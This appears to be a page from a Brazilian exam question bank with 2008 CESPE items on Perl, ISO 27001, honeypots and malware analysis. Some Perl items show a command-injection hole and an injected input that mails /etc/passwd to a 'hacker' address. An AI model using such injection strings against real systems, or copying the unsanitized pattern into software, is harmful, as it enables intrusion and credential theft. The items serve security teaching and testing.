Magna Concursos

Foram encontradas 470 questões.

enunciado 1748573-1

Em relação às estruturas lingüísticas e às idéias do texto acima, julgue os itens de 1 a 6.

Depreende-se das informações do texto que o objetivo das mudanças nos trâmites de licenciamento para construção e funcionamento de hidrelétricas é agilizar o processo.

 

Provas

Questão presente nas seguintes provas
1525222 Ano: 2008
Disciplina: TI - Desenvolvimento de Sistemas
Banca: CESPE / CEBRASPE
Orgão: CTI

1 open (HTML, "-")
2 or exec ("/usr/bin/txt2html", "/usr/stats/$ username");
3 print while <HTML>;
.
.
4 $ mail_to = &get_name_from_input;
5 open (MAIL," /usr/lib/sendmail $ mail_to");
6 print MAIL "To: $ mailto\nFrom: me\n\nHi there!\n";
7 close MAIL;

Considerando o trecho de código em Perl acima, julgue o item a seguir.

Nas linhas de 4 a 7, é mostrado um trecho de código no qual, se a variável $ mail_to tivesse o valor a@x.com; mail hacker@teste.com</etc/passwd permitiria que o arquivo de passwords fosse enviado a um usuário malicioso.

 

Provas

Questão presente nas seguintes provas
1525221 Ano: 2008
Disciplina: TI - Desenvolvimento de Sistemas
Banca: CESPE / CEBRASPE
Orgão: CTI

1 open (HTML, "-")
2 or exec ("/usr/bin/txt2html", "/usr/stats/$ username");
3 print while <HTML>;
.
.
4 $ mail_to = &get_name_from_input;
5 open (MAIL," /usr/lib/sendmail $ mail_to");
6 print MAIL "To: $ mailto\nFrom: me\n\nHi there!\n";
7 close MAIL;

Considerando o trecho de código em Perl acima, julgue o item a seguir.

No trecho de código das linhas de 1 a 3, se o valor de retorno do open() for diferente de zero, é executado o programa txt2html, caso contrário, a sentença do print é executada.

 

Provas

Questão presente nas seguintes provas
1525220 Ano: 2008
Disciplina: TI - Desenvolvimento de Sistemas
Banca: CESPE / CEBRASPE
Orgão: CTI

1 open (HTML, "-")
2 or exec ("/usr/bin/txt2html", "/usr/stats/$ username");
3 print while <HTML>;
.
.
4 $ mail_to = &get_name_from_input;
5 open (MAIL," /usr/lib/sendmail $ mail_to");
6 print MAIL "To: $ mailto\nFrom: me\n\nHi there!\n";
7 close MAIL;

Considerando o trecho de código em Perl acima, julgue o item a seguir.

Nas linhas de 1 a 3, ao se abrir um arquivo para "-", seja para leitura ou escrita, o Perl executa um fork do processo atual e retorna o PID do processo filho ao processo pai e 0 para o processo filho. A sentença or é utilizada como elemento decisório para quando se está no processo pai ou no processo filho.

 

Provas

Questão presente nas seguintes provas
1525219 Ano: 2008
Disciplina: TI - Segurança da Informação
Banca: CESPE / CEBRASPE
Orgão: CTI

Com base nas normas ABNT NBR ISO/IEC 27001:2006 e 27002:2005, julgue os itens que se seguem.

A seção 5 da norma ISO/IEC 27001 trata de como a informação deve ser classificada, de acordo com a sua necessidade de segurança e controle de acesso.

 

Provas

Questão presente nas seguintes provas
1525218 Ano: 2008
Disciplina: TI - Segurança da Informação
Banca: CESPE / CEBRASPE
Orgão: CTI

Com base nas normas ABNT NBR ISO/IEC 27001:2006 e 27002:2005, julgue os itens que se seguem.

Uma organização que deseje implantar um sistema de gestão de segurança da informação (SGSI) deve adotar como base a norma ABNT NBR ISO/IEC 27001:2006

 

Provas

Questão presente nas seguintes provas
1525217 Ano: 2008
Disciplina: TI - Redes de Computadores
Banca: CESPE / CEBRASPE
Orgão: CTI

Com base nos conceitos de honeynets e honeypots, julgue os itens seguintes.

Um desfragmentador de tráfego em um elemento de rede tem por objetivo remover as ambigüidades no tráfego que por ele passa. Exemplos de desfragmentadores incluem o programa norm e a diretiva scrub do OpenBSD.

 

Provas

Questão presente nas seguintes provas
1525216 Ano: 2008
Disciplina: TI - Segurança da Informação
Banca: CESPE / CEBRASPE
Orgão: CTI

Com base nos conceitos de honeynets e honeypots, julgue os itens seguintes.

Um invasor que possa emitir consultas ou respostas ARP forjadas, injetando informações falsas nos caches dos hosts em uma rede Ethernet, pode receber o tráfego de rede destinado a outro host, repassando-o, em seguida, para o seu destino original.

 

Provas

Questão presente nas seguintes provas
1525215 Ano: 2008
Disciplina: TI - Segurança da Informação
Banca: CESPE / CEBRASPE
Orgão: CTI

Com base nos conceitos de honeynets e honeypots, julgue os itens seguintes.

Os honeypots de pesquisa são aqueles que aumentam a segurança de uma organização específica e ajudam a mitigar riscos. Usualmente possuem as mesmas configurações que o ambiente de trabalho da organização.

 

Provas

Questão presente nas seguintes provas
1525214 Ano: 2008
Disciplina: TI - Segurança da Informação
Banca: CESPE / CEBRASPE
Orgão: CTI

Quanto a conceitos de análise e engenharia reversa de artefatos maliciosos, julgue os itens a seguir.

Na detecção de código malicioso, a análise dinâmica permite realizar uma avaliação exaustiva ao não se restringir a uma execução específica de um programa. O contrário ocorre na análise temporal, que verifica o programa somente no momento da sua execução.

 

Provas

Questão presente nas seguintes provas